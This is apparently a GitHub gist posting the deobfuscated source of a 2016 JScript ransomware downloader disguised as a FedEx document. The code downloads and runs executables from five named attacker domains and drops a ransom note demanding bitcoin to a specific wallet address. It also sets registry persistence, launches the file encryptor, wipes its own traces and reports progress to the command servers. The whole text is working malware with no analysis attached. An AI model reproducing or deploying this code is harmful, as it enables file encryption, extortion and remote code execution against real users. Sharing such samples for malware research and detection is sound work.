/FedEx_0000805344.doc_deobfuscated.js
Created Jun 9, 2016
Deobfuscated Javascript - Original one "FedEx_0000805344.doc.js"
| var id = "TRMZDhCofKbv_q5hiDKefL875Yntf6t7_hOQK5aWmdOm2ocfp6cINwoJggYEDAZgrLxmdcW82GWld4k-xmgrFDct"; | |
| var ad = "14QHA8ycP4YMqtohbietj3JFKKjRkuPtv3"; | |
| var bc = "0.37070"; | |
| var ld = 0; | |
| var cq = String.fromCharCode(34); | |
| var cs = String.fromCharCode(92); | |
| var ll = ["masterline.info", "mos-traffik.ru", "nahabinonasporte.ru", "shkola.selivaniha.ru", "windigomsk.ru"]; | |
| var ws = WScript.CreateObject("WScript.Shell"); | |
| var fn = ws.ExpandEnvironmentStrings("%TEMP%") + cs + "a"; | |
| var pd = ws.ExpandEnvironmentStrings("%TEMP%") + cs + "php4ts.dll"; | |
| var xo = WScript.CreateObject("Msxml2.XMLHTTP"); | |
| var xa = WScript.CreateObject("ADODB.Stream"); | |
| var fo = WScript.CreateObject("Scripting.FileSystemObject"); | |
| if (!fo.FileExists(fn + ".txt")) { | |
| for (var n = 1; n <= 5; n++) { | |
| for (var i = ld; i < ll.length; i++) { | |
| var dn = 0; | |
| try { | |
| xo.open("GET", "http://" + ll[i] + "/counter/?ad=" + ad + "&id=" + id + "&rnd=" + i + n, false); | |
| xo.send(); | |
| if (xo.status == 200) { | |
| xa.open(); | |
| xa.type = 1; | |
| xa.write(xo.responseBody); | |
| if (xa.size > 1000) { | |
| dn = 1; | |
| if (n <= 2) { | |
| xa.saveToFile(fn + n + ".exe", 2); | |
| try { | |
| ws.Run(fn + n + ".exe", 1, 0); | |
| } catch (er) {}; | |
| } else if (n == 3) { | |
| xa.saveToFile(fn + ".exe", 2); | |
| } else if (n == 4) { | |
| xa.saveToFile(pd, 2); | |
| } else if (n == 5) { | |
| xa.saveToFile(fn + ".php", 2); | |
| } | |
| }; | |
| xa.close(); | |
| }; | |
| if (dn == 1) { | |
| ld = i; | |
| break; | |
| }; | |
| } catch (er) {}; | |
| }; | |
| }; | |
| if (fo.FileExists(fn + ".exe") && fo.FileExists(pd) && fo.FileExists(fn + ".php")) { | |
| xo.open("GET", "http://" + ll[ld] + "/counter/?ad=" + ad + "&id=" + id + "&st=start", false); | |
| xo.send(); | |
| var fp = fo.CreateTextFile(fn + ".txt", true); | |
| fp.WriteLine("ATTENTION!"); | |
| fp.WriteLine(""); | |
| fp.WriteLine("All your documents, photos, databases and other important personal files"); | |
| fp.WriteLine("were encrypted using strong RSA-1024 algorithm with a unique key."); | |
| fp.WriteLine("To restore your files you have to pay " + bc + " BTC (bitcoins)."); | |
| fp.WriteLine("Please follow this manual:"); | |
| fp.WriteLine(""); | |
| fp.WriteLine("1. Create Bitcoin wallet here:"); | |
| fp.WriteLine(""); | |
| fp.WriteLine(" https://blockchain.info/wallet/new"); | |
| fp.WriteLine(""); | |
| fp.WriteLine("2. Buy " + bc + " BTC with cash, using search here:"); | |
| fp.WriteLine(""); | |
| fp.WriteLine(" https://localbitcoins.com/buy_bitcoins"); | |
| fp.WriteLine(""); | |
| fp.WriteLine("3. Send " + bc + " BTC to this Bitcoin address:"); | |
| fp.WriteLine(""); | |
| fp.WriteLine(" " + ad); | |
| fp.WriteLine(""); | |
| fp.WriteLine("4. Open one of the following links in your browser to download decryptor:"); | |
| fp.WriteLine(""); | |
| for (var i = 0; i < ll.length; i++) { | |
| fp.WriteLine(" http://" + ll[i] + "/counter/?a=" + ad); | |
| }; | |
| fp.WriteLine(""); | |
| fp.WriteLine("5. Run decryptor to restore your files."); | |
| fp.WriteLine(""); | |
| fp.WriteLine("PLEASE REMEMBER:"); | |
| fp.WriteLine(""); | |
| fp.WriteLine(" - If you do not pay in 3 days YOU LOOSE ALL YOUR FILES."); | |
| fp.WriteLine(" - Nobody can help you except us."); | |
| fp.WriteLine(" - It`s useless to reinstall Windows, update antivirus software, etc."); | |
| fp.WriteLine(" - Your files can be decrypted only after you make payment."); | |
| fp.WriteLine(" - You can find this manual on your desktop (DECRYPT.txt)."); | |
| fp.Close(); | |
| ws.Run("%COMSPEC% /c REG ADD " + cq + "HKCU" + cs + "SOFTWARE" + cs + "Microsoft" + cs + "Windows" + cs + "CurrentVersion" + cs + "Run" + cq + " /V " + cq + "Crypted" + cq + " /t REG_SZ /F /D " + cq + fn + ".txt" + cq, 0, 0); | |
| ws.Run("%COMSPEC% /c REG ADD " + cq + "HKCR" + cs + ".crypted" + cq + " /ve /t REG_SZ /F /D " + cq + "Crypted" + cq, 0, 0); | |
| ws.Run("%COMSPEC% /c REG ADD " + cq + "HKCR" + cs + "Crypted" + cs + "shell" + cs + "open" + cs + "command" + cq + " /ve /t REG_SZ /F /D " + cq + "notepad.exe " + cs + cq + fn + ".txt" + cs + cq + cq, 0, 0); | |
| ws.Run("%COMSPEC% /c copy /y " + cq + fn + ".txt" + cq + " " + cq + "%AppData%" + cs + "Desktop" + cs + "DECRYPT.txt" + cq, 0, 0); | |
| ws.Run("%COMSPEC% /c copy /y " + cq + fn + ".txt" + cq + " " + cq + "%UserProfile%" + cs + "Desktop" + cs + "DECRYPT.txt" + cq, 0, 0); | |
| ws.Run("%COMSPEC% /c " + fn + ".exe " + cq + fn + ".php" + cq, 0, 1); | |
| ws.Run("%COMSPEC% /c notepad.exe " + cq + fn + ".txt" + cq, 0, 0); | |
| var fp = fo.CreateTextFile(fn + ".php", true); | |
| for (var i = 0; i < 1000; i++) { | |
| fp.WriteLine(ad); | |
| }; | |
| fp.Close(); | |
| ws.Run("%COMSPEC% /c DEL " + cq + fn + ".php" + cq, 0, 0); | |
| ws.Run("%COMSPEC% /c DEL " + cq + fn + ".exe" + cq, 0, 0); | |
| ws.Run("%COMSPEC% /c DEL " + cq + pd + cq, 0, 0); | |
| xo.open("GET", "http://" + ll[ld] + "/counter/?ad=" + ad + "&id=" + id + "&st=done", false); | |
| xo.send(); | |
| }; | |
| }; |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment